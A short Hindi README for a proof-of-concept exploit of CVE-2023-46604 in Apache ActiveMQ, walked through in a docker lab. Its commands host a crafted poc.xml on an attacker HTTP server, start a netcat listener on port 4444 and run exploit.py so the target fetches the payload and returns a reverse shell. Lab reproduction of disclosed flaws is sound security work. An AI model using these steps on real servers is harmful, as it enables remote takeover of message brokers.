
CVE-2023-46604 के लिए PoC एक्सप्लॉइट जो Apache ActiveMQ को लक्षित करता है, HTTP पर क्राफ्टेड XML पेलोड के माध्यम से रिवर्स शेल प्रदान करता है।
CVE-2023-46604

आवश्यक वातावरण के अनुसार victim machine और target machine को शामिल करते हुए docker-compose बनाएं। Victim machine पर ActiveMQ प्रारंभ करें।
अब attacker machine पर जाएँ: • PoC भेजने के लिए HTTP सेवा प्रारंभ करें: python3 -m http.server
• Attacker machine पर आने वाले कनेक्शन को सुनने के लिए netcat का उपयोग करें: nc -nlvp 4444
• Reverse shell कनेक्शन बनाने के लिए payload भेजें: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml जहाँ:
यह देखा जा सकता है कि 'exploit.py' फ़ाइल को निष्पादित करने के बाद, exploit कोड web server पर मौजूद 'poc.xml' पैकेट को उस लक्ष्य पर भेजता है जो target server पर चल रही ActiveMQ सेवा का पता है। साथ ही, attacker machine पर चल रहे HTTP webserver को target machine के IP पते से भेजा गया request भी प्राप्त होता है।
Payload भेजने के बाद, attacker machine के पोर्ट 4444 पर सुन रहे टर्मिनल पर जाएँ। हम देख सकते हैं कि victim machine का reverse shell वापस भेज दिया गया है।